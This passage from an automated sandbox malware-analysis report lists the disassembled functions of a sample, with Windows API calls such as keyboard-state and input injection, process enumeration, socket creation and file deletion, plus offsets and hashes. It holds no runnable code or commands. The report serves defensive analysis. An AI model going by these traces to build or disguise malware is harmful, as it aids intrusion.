                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                • String ID: %s%d
                                                                                • API String ID: 1272988791-1110647743
                                                                                • Opcode ID: 93be9bd2a0d3dee65eed0409c1e9b33c61455bbe2c30f1d445b3f4c7186d8d7e
                                                                                • Instruction ID: 237c6cd422f88425945eed17331324ee0575ac389b48a711a3a9e2df1e4e7e8f
                                                                                • Opcode Fuzzy Hash: 93be9bd2a0d3dee65eed0409c1e9b33c61455bbe2c30f1d445b3f4c7186d8d7e
                                                                                • Instruction Fuzzy Hash: 6011D271600206ABDF547F64CC99EED376BAF84314F04507AF909DB292DF7099068BB0
                                                                                Function 00665882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006658C1
                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006658EE
                                                                                • DrawMenuBar.USER32(?), ref: 006658FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: 0
                                                                                • API String ID: 3227129158-4108050209
                                                                                • Opcode ID: f438441966314b2bf9d1c97f2c967330bbb72501d5b595d623d23cf64d2b4f49
                                                                                • Instruction ID: 48b12d0bf5354f7b2638765953d9a493941084192d57da6539fe2c530d0847dd
                                                                                • Opcode Fuzzy Hash: f438441966314b2bf9d1c97f2c967330bbb72501d5b595d623d23cf64d2b4f49
                                                                                • Instruction Fuzzy Hash: 6701A131500248EFDB109F11DC45BAEBBBAFB45360F00809AE88AD6251DF309A90DF30
                                                                                Function 0062D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0062D3BF
                                                                                • FreeLibrary.KERNEL32 ref: 0062D3E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                • API String ID: 3013587201-2590602151
                                                                                • Opcode ID: 8ed14fad56e7569e07a669eedde9537001c6bffb3c9f7808b6fcd85a6789a1ff
                                                                                • Instruction ID: 90ac8aefb888c372905e91e8bc56e22f2c319d1a92334f33c867cbb6ef1164eb
                                                                                • Opcode Fuzzy Hash: 8ed14fad56e7569e07a669eedde9537001c6bffb3c9f7808b6fcd85a6789a1ff
                                                                                • Instruction Fuzzy Hash: A7F05532802E30DBD7319A10EC18AF97B27AF13701B68C415E982E6244EB60CE408ED2
                                                                                Function 0063007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3690f45a3f6a59bf97c0e98726a24066bd76bd81c7ee0f069cc946462c26248
                                                                                • Instruction ID: eb165dee108bf5066740417c521e670546ccfb6c87d190b71e07bd4363d00bd6
                                                                                • Opcode Fuzzy Hash: c3690f45a3f6a59bf97c0e98726a24066bd76bd81c7ee0f069cc946462c26248
                                                                                • Instruction Fuzzy Hash: 03C14D75A00216EFEB14CFA4C8A4EAEB7B6FF48714F208598E505EB251D731DE45CB90
                                                                                Function 0065342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 1998397398-0
                                                                                • Opcode ID: ca95c2045ebe5f69f205799b0a6ca6e00f51bf54906ae473b27b9067f1a826e1
                                                                                • Instruction ID: e92017805ed9d8c95a0508d5e4beec968854c37b25e3e28478ed0389c5a24d3a
                                                                                • Opcode Fuzzy Hash: ca95c2045ebe5f69f205799b0a6ca6e00f51bf54906ae473b27b9067f1a826e1
                                                                                • Instruction Fuzzy Hash: 6AA14A756042119FC710DF28C485A2ABBE6FF88755F04895EFD899B362EB30ED05CB92
                                                                                Function 00630436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0066FC08,?), ref: 006305F0
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0066FC08,?), ref: 00630608
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0066CC40,000000FF,?,00000000,00000800,00000000,?,0066FC08,?), ref: 0063062D
                                                                                • _memcmp.LIBVCRUNTIME ref: 0063064E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID:
                                                                                • API String ID: 314563124-0
                                                                                • Opcode ID: 29da5f275ec782b3942f526b75ba2ba0502b521b9f113fb0f4084e1357412620
                                                                                • Instruction ID: 022304b2366de04fdb78115ccfb1923c76fb43b36981ded7a877c7ecce3916b4
                                                                                • Opcode Fuzzy Hash: 29da5f275ec782b3942f526b75ba2ba0502b521b9f113fb0f4084e1357412620
                                                                                • Instruction Fuzzy Hash: AD811071A00109EFDB04DF94C994DEEB7BAFF89315F104599E506AB250DB71AE0ACBA0
                                                                                Function 00611391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 56e32ca72041bf1a35c9b414ac46a6943609a09458e511141cbc2143c946579a
                                                                                • Instruction ID: c65f95dbaf4077fc7383e84239e33073caad7411ac835d12dd06832732c1dfbc
                                                                                • Opcode Fuzzy Hash: 56e32ca72041bf1a35c9b414ac46a6943609a09458e511141cbc2143c946579a
                                                                                • Instruction Fuzzy Hash: 9C414935600505ABDB256FB98C496FF3EE7FF43B70F1C4229F619DA292E63448815362
                                                                                Function 00666278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(01A3E418,?), ref: 006662E2
                                                                                • ScreenToClient.USER32(?,?), ref: 00666315
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00666382
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 4a04a9633751a2808054807c2b607d15d3f0fb15fe51f7561e8e1c4a89bca591
                                                                                • Instruction ID: 1826d1b682411900899bd9151f786c0615b5b549c1f7895bdb83e438c34c2673
                                                                                • Opcode Fuzzy Hash: 4a04a9633751a2808054807c2b607d15d3f0fb15fe51f7561e8e1c4a89bca591
                                                                                • Instruction Fuzzy Hash: 37510A74A00249EFDB10DF58E8809AE7BB6EF85364F10915AF855AB390D770AD81CB90
                                                                                Function 00651AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00651AFD
                                                                                • WSAGetLastError.WSOCK32 ref: 00651B0B
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00651B8A
                                                                                • WSAGetLastError.WSOCK32 ref: 00651B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$socket
                                                                                • String ID:
                                                                                • API String ID: 1881357543-0
                                                                                • Opcode ID: f1466b7206b6622a4986f5650e5f1993f3d41bd276f9b8634466d4d7f9fb6e0b
                                                                                • Instruction ID: 114d8bc8e2fabb3a630027303e99995466d1ac18fbcd46d041bd609849a5be39
                                                                                • Opcode Fuzzy Hash: f1466b7206b6622a4986f5650e5f1993f3d41bd276f9b8634466d4d7f9fb6e0b
                                                                                • Instruction Fuzzy Hash: 9641A434600201AFE720AF24C88AF657BE6EB85718F548459F95A9F3D3D7B2DD42CB90
                                                                                Function 0060B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 869e4901fa37922f656839ccfdd99ea7944430044095a67eb27cf15532d509ff
                                                                                • Instruction ID: 520088067bd3ca8d513427bae123c4d6dbaea9097a50466834509d82c2204d66
                                                                                • Opcode Fuzzy Hash: 869e4901fa37922f656839ccfdd99ea7944430044095a67eb27cf15532d509ff
                                                                                • Instruction Fuzzy Hash: E7412875A40304AFD7299F78CC45BABBBEAEF88710F10856EF141DB6D1D3719A418780
                                                                                Function 006456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00645783
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 006457A9
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006457CE
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006457FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: d2447c6acfb6cd158743bc83463bd2d6f338ede56038a4c574afad90e9fdf67c
                                                                                • Instruction ID: 441a09c1df57d81a03954dc9c5dc81a2015e8950dcd49942b1aeb7cc5ab4171b
                                                                                • Opcode Fuzzy Hash: d2447c6acfb6cd158743bc83463bd2d6f338ede56038a4c574afad90e9fdf67c
                                                                                • Instruction Fuzzy Hash: 46411C35600A11DFCB21DF19C444A59BBE2FF89720F19848AEC4AAB362DB31FD00CB91
                                                                                Function 0060D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,005F6D71,00000000,00000000,005F82D9,?,005F82D9,?,00000001,005F6D71,?,00000001,005F82D9,005F82D9), ref: 0060D910
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0060D999
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0060D9AB
                                                                                • __freea.LIBCMT ref: 0060D9B4
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: cc02757bb849c4f7a6b613512ab4d5c9154971800ec6f0dd60c0098be7276fc8
                                                                                • Instruction ID: 2253ae2a2baa030ddcaba798387e5233c67ac5ac09aab7e55165084ffbcd6815
                                                                                • Opcode Fuzzy Hash: cc02757bb849c4f7a6b613512ab4d5c9154971800ec6f0dd60c0098be7276fc8
                                                                                • Instruction Fuzzy Hash: 1331AE72A0020AABDB299FA4DC45EEF7BA6EB41320F054268FC04D6290EB35CD50CB90
                                                                                Function 006652C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00665352
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00665375
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00665382
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006653A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                • String ID:
                                                                                • API String ID: 3340791633-0
                                                                                • Opcode ID: 1bccff81583792652c89661212df047d01a9c19cf74646fca9d5df901c4e21b0
                                                                                • Instruction ID: 28e6335c8979a3ff6761347d878398f8d7a71f40e8e5805da7f7d7d308c63a08
                                                                                • Opcode Fuzzy Hash: 1bccff81583792652c89661212df047d01a9c19cf74646fca9d5df901c4e21b0
                                                                                • Instruction Fuzzy Hash: 9231B434A55A08EFEF309F14CC17BE93767AB05B90F545102FA52A63E1E7B0A9409B82
                                                                                Function 0063AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0063ABF1
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0063AC0D
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0063AC74
                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0063ACC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 4f5decd169a09a9ad54e11a1175eb8d1cb3e7b8062ac089fd5179ffe1bfab784
                                                                                • Instruction ID: 104aa2ec079e6b54c0280e67cb115284205f86e395e00a440f4b6d7a877ed5e4
                                                                                • Opcode Fuzzy Hash: 4f5decd169a09a9ad54e11a1175eb8d1cb3e7b8062ac089fd5179ffe1bfab784
                                                                                • Instruction Fuzzy Hash: F2310830A046186FEF35CBA5CC087FA7BA7AB85320F04631AE4C5962D1C3758D85A7D6
                                                                                Function 00667674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 0066769A
                                                                                • GetWindowRect.USER32(?,?), ref: 00667710
                                                                                • PtInRect.USER32(?,?,00668B89), ref: 00667720
                                                                                • MessageBeep.USER32(00000000), ref: 0066778C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 6bd2a53278a7fb6c4c95f8c559d85f8f1f694be0087f16ffbe0a24027575d330
                                                                                • Instruction ID: 67f37bec90999187c50112ebb785a7dda750694bb5ec039d64a6506353523a3f
                                                                                • Opcode Fuzzy Hash: 6bd2a53278a7fb6c4c95f8c559d85f8f1f694be0087f16ffbe0a24027575d330
                                                                                • Instruction Fuzzy Hash: DE418D34605214EFDB01DF58D894EA9BBF6FB4A318F1980A9E415DF361D730A942CF90
                                                                                Function 006616DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 006616EB
                                                                                  • Part of subcall function 00633A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00633A57
                                                                                  • Part of subcall function 00633A3D: GetCurrentThreadId.KERNEL32 ref: 00633A5E
                                                                                  • Part of subcall function 00633A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006325B3), ref: 00633A65
                                                                                • GetCaretPos.USER32(?), ref: 006616FF
                                                                                • ClientToScreen.USER32(00000000,?), ref: 0066174C
                                                                                • GetForegroundWindow.USER32 ref: 00661752
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 903a67bab29f8165b742f44ef9b78b811f95a3efcd730397afd138bc228eede1
                                                                                • Instruction ID: 90c8ed0d10d844ffebb3700ed13b12d0be7fd836768610f0f7400eb83838e2ae
                                                                                • Opcode Fuzzy Hash: 903a67bab29f8165b742f44ef9b78b811f95a3efcd730397afd138bc228eede1
                                                                                • Instruction Fuzzy Hash: F1313071D00149AFC710DFA9C885CEEBBF9FF89304B5480AAE455E7311E6319E45CBA0
                                                                                Function 0063D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0063D501
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0063D50F
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0063D52F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0063D5DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
